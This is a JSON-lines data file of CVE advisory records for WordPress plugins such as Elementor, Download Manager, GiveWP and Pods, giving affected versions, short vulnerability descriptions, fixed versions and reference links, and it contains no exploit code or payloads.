{"CVE_ID":"CVE-2024-11721","slug":"acf-frontend-form-element","versionImpact":"3.24.5","versionEndExcluding":"3.25.1","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.24.5. This is due to insufficient controls on the user role select field when utilizing the 'Role' field in a form. This makes it possible for unauthenticated attackers to create new administrative user accounts, even when the administrative user role has not been provided as an option to the user, granted that unauthenticated users have been provided access to the form.","recommendation":"Update to version 3.25.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204192\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/frontend\\\/fields\\\/user\\\/class-role.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204192\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/frontend\\\/fields\\\/user\\\/class-role.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11720","slug":"acf-frontend-form-element","versionImpact":"3.24.5","versionEndExcluding":"3.25.1","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via submission forms in all versions up to, and including, 3.24.5 due to insufficient input sanitization and output escaping on the new Taxonomy form. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when lower-level users have been granted access to submit specific forms, which is disabled by default.","recommendation":"Update to version 3.25.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204192%40acf-frontend-form-element&new=3204192%40acf-frontend-form-element&sfp_email=&sfph_mail=#file32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204192%40acf-frontend-form-element&new=3204192%40acf-frontend-form-element&sfp_email=&sfph_mail=#file32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69a464f4-c357-446f-a5b8-0919d9af56c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69a464f4-c357-446f-a5b8-0919d9af56c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13623","slug":"order-export-and-more-for-woocommerce","versionImpact":"3.24","versionEndExcluding":"3.25","description":"The Order Export for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.24 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain exported order information. The plugin is only vulnerable when 'Order data storage' is set to 'WordPress posts storage (legacy)', and cannot be exploited when the default option of 'High-performance order storage' is enabled.","recommendation":"Update to version 3.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-export-and-more-for-woocommerce\\\/trunk\\\/inc\\\/JEMEXP_Order.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-export-and-more-for-woocommerce\\\/trunk\\\/inc\\\/JEMEXP_Order.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230283\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d6dffd-8df3-4611-ad94-6d806aa7328a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d6dffd-8df3-4611-ad94-6d806aa7328a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6757","slug":"elementor","versionImpact":"3.24.5","versionEndExcluding":"3.24.6","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 3.23.5 via the get_image_alt function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract either excerpt data or titles of private or password-protected posts.","recommendation":"Update to version 3.24.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96fa9ed7-6c13-4356-8a25-8a309be2b0e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96fa9ed7-6c13-4356-8a25-8a309be2b0e9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.0\\\/includes\\\/controls\\\/media.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.0\\\/includes\\\/controls\\\/media.php#L413\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5416","slug":"elementor","versionImpact":"3.23.4","versionEndExcluding":"3.24.0","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2.","recommendation":"Update to version 3.24.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/traits\\\/button-trait.php#L523\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/traits\\\/button-trait.php#L523\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/image.php#L820\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/image.php#L820\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/social-icons.php#L659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/social-icons.php#L659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/testimonial.php#L608\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/testimonial.php#L608\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123936\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123936\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149264\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149264\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4756","slug":"youtube-channel","versionEndExcluding":"3.23.0","description":"The My YouTube Channel WordPress plugin before 3.23.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d67b0f7a-fdb1-4305-9976-c5f77b0e3b61\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d67b0f7a-fdb1-4305-9976-c5f77b0e3b61\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2331","slug":"give","versionImpact":"3.22.1","versionEndExcluding":"3.22.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.22.1 via a misconfigured capability check in the 'permissionsCheck' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including reports detailing donors and donation amounts.","recommendation":"Update to version 3.22.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/Reports\\\/Endpoint.php?rev=3252319#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258797\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258797\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4d9acfb-bb9d-4b00-b439-c7ccea751f8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4d9acfb-bb9d-4b00-b439-c7ccea751f8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4619","slug":"elementor","versionImpact":"3.21.4","versionEndExcluding":"3.22.0-beta2","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018hover_animation\u2019 parameter in versions up to, and including, 3.21.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.22.0-beta2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7e1028e-e04b-46c4-b574-889d9fc1069d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7e1028e-e04b-46c4-b574-889d9fc1069d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/trunk\\\/includes\\\/widgets\\\/image-box.php#L696\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/trunk\\\/includes\\\/widgets\\\/image-box.php#L696\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089420\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4107","slug":"elementor-pro","versionImpact":"3.21.0","versionEndExcluding":"3.21.2","description":"The Elementor Website Builder \u2013 More than Just a Page Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in versions up to, and including, 3.21.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.21.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d5d47bd-4f05-4dc7-84c1-f7bc1196ee16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d5d47bd-4f05-4dc7-84c1-f7bc1196ee16?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/doc.clickup.com\\\/9011113249\\\/d\\\/h\\\/8chnb91-5091\\\/3951e6f2afbd388\",\"name\":\"https:\\\/\\\/doc.clickup.com\\\/9011113249\\\/d\\\/h\\\/8chnb91-5091\\\/3951e6f2afbd388\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0912","slug":"give","versionImpact":"3.19.4","versionEndExcluding":"3.20.0","description":"The Donations Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.19.4 via deserialization of untrusted input from the Donation Form through the 'card_address' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to achieve remote code execution.","recommendation":"Update to version 3.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/pull\\\/7679\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/pull\\\/7679\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Properties\\\/BillingAddress.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Properties\\\/BillingAddress.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donors\\\/Repositories\\\/DonorRepository.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234114\\\/give\\\/trunk\\\/src\\\/Donors\\\/Repositories\\\/DonorRepository.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234114%40give&new=3234114%40give&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234114%40give&new=3234114%40give&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8ae1b0-e9a0-4179-970b-dbcb0642547c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8ae1b0-e9a0-4179-970b-dbcb0642547c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8284","slug":"download-manager","versionImpact":"3.2.98","versionEndExcluding":"3.2.99","description":"The Download Manager WordPress plugin before 3.2.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.2.99, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93e38b8c-8a2e-4264-b520-ebdbe995d61e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93e38b8c-8a2e-4264-b520-ebdbe995d61e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6208","slug":"download-manager","versionImpact":"3.2.97","versionEndExcluding":"3.2.98","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_all_packages' shortcode in all versions up to, and including, 3.2.97 due to insufficient input sanitization and output escaping on the 'cols' parameter. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c67d2f8-d918-42ef-a301-27eed7fa41b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c67d2f8-d918-42ef-a301-27eed7fa41b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L302\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L302\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=3097323#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3126662\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3126662\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4001","slug":"download-manager","versionImpact":"3.2.93","versionEndExcluding":"3.2.94","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_modal_login_form' shortcode in all versions up to, and including, 3.2.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b478d88d-1423-4a33-b8ef-08b9e66a5d98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b478d88d-1423-4a33-b8ef-08b9e66a5d98?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096459\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2098","slug":"download-manager","versionImpact":"3.2.89","versionEndExcluding":"3.2.90","description":"The Download Manager plugin for WordPress is vulnerable to unauthorized access of data due to an improper authorization check on the 'protectMediaLibrary' function in all versions up to, and including, 3.2.89. This makes it possible for unauthenticated attackers to download password-protected files.","recommendation":"Update to version 3.2.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1301c8af-d81a-40f1-96fa-e8252309d8a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1301c8af-d81a-40f1-96fa-e8252309d8a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072712\\\/download-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072712\\\/download-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8759","slug":"wp-nested-pages","versionImpact":"3.2.8","versionEndExcluding":"3.2.9","description":"The Nested Pages WordPress plugin before 3.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3dd41ecb-d0dc-4c23-9e5b-b1f7fbaaddfd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3dd41ecb-d0dc-4c23-9e5b-b1f7fbaaddfd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0333","slug":"templatesnext-toolkit","versionEndExcluding":"3.2.9","description":"The TemplatesNext ToolKit WordPress plugin before 3.2.9 does not validate some of its shortcode attributes before using them to generate an HTML tag, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e86ff4d5-d549-4c71-b80e-6a9b3bfddbfc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e86ff4d5-d549-4c71-b80e-6a9b3bfddbfc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1766","slug":"download-manager","versionImpact":"3.2.86","versionEndExcluding":"3.2.87","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's Display Name in all versions up to, and including, 3.2.86 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.","recommendation":"Update to version 3.2.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9774c999-acb6-4c5f-ad6c-10979660b164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9774c999-acb6-4c5f-ad6c-10979660b164?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/edit-profile.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/edit-profile.php#L16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6954","slug":"download-manager","versionImpact":"3.2.85","versionEndExcluding":"3.2.86","description":"The Download Manager Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.2.85 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.86, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cdd64a4-040b-4dc9-a8df-dbecfeb928c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cdd64a4-040b-4dc9-a8df-dbecfeb928c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Category\\\/Shortcodes.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Category\\\/Shortcodes.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/Shortcodes.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/Shortcodes.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode-toolbar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.83\\\/src\\\/Package\\\/views\\\/packages-shortcode-toolbar.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6421","slug":"download-manager","versionImpact":"3.2.82","versionEndExcluding":"3.2.83","description":"The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.","recommendation":"Update to version 3.2.83, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/244c7c00-fc8d-4a73-bbe0-7865c621d410\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/244c7c00-fc8d-4a73-bbe0-7865c621d410\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1446","slug":"pods","versionImpact":"3.2.8.1","versionEndExcluding":"3.2.8.2","description":"The Pods  WordPress plugin before 3.2.8.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 3.2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c170fb45-7ed5-40ef-99f6-8da035a23d89\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c170fb45-7ed5-40ef-99f6-8da035a23d89\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11849","slug":"pods","versionImpact":"3.2.8","versionEndExcluding":"3.2.8.1","description":"The Pods  WordPress plugin before 3.2.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85b25a5b-c30b-4a2a-96c1-f05b4eba8a9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85b25a5b-c30b-4a2a-96c1-f05b4eba8a9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12636","slug":"wplegalpages","versionImpact":"3.2.7","versionEndExcluding":"3.2.8","description":"The Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.6. This is due to missing or incorrect nonce validation on the 'create_popup_delete_process' function. This makes it possible for unauthenticated attackers to delete popups via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.8, or a newer patched 